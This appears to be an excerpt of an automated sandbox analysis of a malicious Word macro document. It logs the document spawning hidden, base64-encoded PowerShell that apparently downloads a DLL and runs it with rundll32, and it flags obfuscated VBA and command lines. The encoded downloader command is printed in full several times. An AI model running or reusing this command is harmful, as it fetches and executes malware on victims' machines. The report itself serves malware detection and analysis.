Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Ygyhlqt\Bx5jfmo\R43H.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Slimgulabo\vhtbjtkrz.lpr',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bvjuzxolryfk\tucwdqbdtfe.wnx',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bsmdm\ghwk.vcj',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Anheubolw\yblyupae.she',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bwaqczxvcucs\mfqhcresmvq.yyb',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvkklg\owmtf.xpy',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eqlmzzdzvxl\jxrtnvzlrw.xix',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qjhyis\vvyps.icm',Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: B:\cliprgn_src\Release\ClipRgn.pdb source: rundll32.exe, 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2106397594.0000000002D37000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2106142374.0000000002A40000.00000002.00000001.sdmp

Source: info_2020_NJY_31940448.doc

Initial sample: OLE summary subject = ADP Rubber Gorgeous Plastic Towels Buckinghamshire hard drive backing up orchid blue functionalities

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: info_2020_NJY_31940448.doc	Stream path 'Macros/VBA/Xhlj9irufb65_wekzf' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Xhlj9irufb65_wekzf			Name: Xhlj9irufb65_wekzf

Document contains an embedded VBA with many randomly named variables

Show sources

Source: info_2020_NJY_31940448.doc

Stream path 'Macros/VBA/Xhlj9irufb65_wekzf' : High entropy of concatenated variable names

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMA

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnAFoAMgAnACsAJwA4ACcAKQArACcATgAnACkAOwAkAFIAaQA2ADIAcwBvAGsAIAA9ACAAKAAnAFIANAAnACsAJwAzAEgAJwApADsAJABUADkAXwBJAD0AKAAnAEgANQAnACsAJwA4AEwAJwApADsAJABCAGgAbgB3AGUAOQAyAD0AJABIAE8ATQBFACsAKAAoACcATQBvACcAKwAoACcAUQBZAGcAJwArACcAeQAnACkAKwAoACcAaABsAHEAdABNAG8AUQAnACsAJwBCACcAKwAnAHgAJwApACsAKAAnADUAagBmAG0AJwArACcAbwBNACcAKwAnAG8AUQAnACkAKQAuACIAcgBgAEUAUABsAGAAQQBDAGUAIgAoACgAJwBNAG8AJwArACcAUQAnACkALABbAFMAVABSAGkATgBHAF0AWwBDAEgAQQByAF0AOQAyACkAKQArACQAUgBpADYAMgBzAG8AawArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAFcANQAwAFYAPQAoACcAWQAnACsAKAAnADcAOQAnACsAJwBZACcAKQApADsAJABPAGcAXwA0ADMAXwBtAD0AKAAnAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvAGEAbABsACcAKQArACgAJwBjAGEAJwArACcAbgBuAGEAYgBpACcAKwAnAHMAbQBlACcAKQArACgAJwBkACcAKwAnAHMALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB1ACcAKwAnAG4AcgAnACkAKwAoACcAYQBpAGQALQAnACsAJwBtAGEAcAAvAFoAJwArACcAWgAnACkAKwAoACcAbQAnACsAJwA2AC8AJwArACcAQABdAGIAJwApACsAKAAnADIAWwAnACsAJwBzACcAKQArACgAJwA6AC8ALwBnACcAKwAnAGkAJwArACcAYQBuACcAKQArACcAbgAnACsAKAAnAGEAJwArACcAcwBwAHMAeQAnACsAJwBjACcAKQArACcAaABpACcAKwAoACcAYwAnACsAJwBzAHQAdQAnACkAKwAoACcAZABpACcAKwAnAG8ALgBjAG8AbQAnACkAKwAoACcALwAnACsAJwBjAGcAaQAtACcAKQArACgAJwBiAGkAJwArACcAbgAvAFAAJwArACcAUAAvAEAAJwArACcAXQAnACkAKwAoACcAYgAnACsAJwAyAFsAcwA6ACcAKQArACcALwAvACcAKwAoACcAaQBlAG4AZwAnACsAJwBsAGkAcwBoACcAKwAnAGEAYgBjAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGMAJwArACcAbwB3AC8AJwArACcASgBIAC8AQAAnACsAJwBdAGIAMgBbAHMAOgAvACcAK			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA2ADkAbQBEAFQANwAgACAAPQAgAFsAdAB5AFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAFIAJwAsACcAUwAnACwAJwBZACcALAAnAFkAUwB0AEUATQAuAEkATwAuAGQAaQBSAEUAYwBUAE8AJwApACAAOwAgACAAIAAkAHkAMQAwAEkAIAAgAD0AIABbAFQAeQBwAEUAXQAoACIAewA2AH0AewAzAH0AewAyAH0AewA3AH0AewA0AH0AewAxAH0AewA1AH0AewA4AH0AewAwAH0AIgAtAGYAIAAnAGEARwBlAFIAJwAsACcAdAAuACcALAAnAEUAJwAsACcAWQBTAHQAJwAsACcATgBFACcALAAnAHMARQBSAHYAaQBDACcALAAnAHMAJwAsACcAbQAuACcALAAnAGUAUABvAGkAbgB0AG0AYQBuACcAKQA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpACcAKwAnAGwAZQBuAHQAbAB5ACcAKQArACgAJwBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQAnACkAKwAnAGUAJwApADsAJABQAHkAMABlAGIAagBpAD0AJABLADEAMgBPACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABQADYANQBaADsAJABYADkAMgBDAD0AKAAoACcAVQAnACsAJwBfADgAJwApACsAJwBSACcAKQA7ACAAIAAkADYAOQBNAGQAdAA3ADoAOgAiAEMAcgBgAGUAYQBUAGAARQBkAEkAUgBFAEMAdABvAGAAUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAWgAnACsAKAAnAE0AJwArACcAUABZAGcAeQAnACsAJwBoACcAKQArACgAJwBsAHEAdABaACcAKwAnAE0AJwApACsAJwBQAEIAJwArACgAJwB4ACcAKwAnADUAagAnACkAKwAnAGYAJwArACgAJwBtAG8AWgBNACcAKwAnAFAAJwApACkALQBSAGUAcABsAGEAYwBFACgAWwBDAGgAYQBSAF0AOQAwACsAWwBDAGgAYQBSAF0ANwA3ACsAWwBDAGgAYQBSAF0AOAAwACkALABbAEMAaABhAFIAXQA5ADIAKQApADsAJABHADcANwBHAD0AKAAnAFgAOAAnACsAJwAwAFAAJwApADsAIAAkAHkAMQAwAEkAOgA6ACIAUwBlAEMAdQByAEkAdABgAHkAcAByAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQASgAzADQASgA9ACgAKAAnA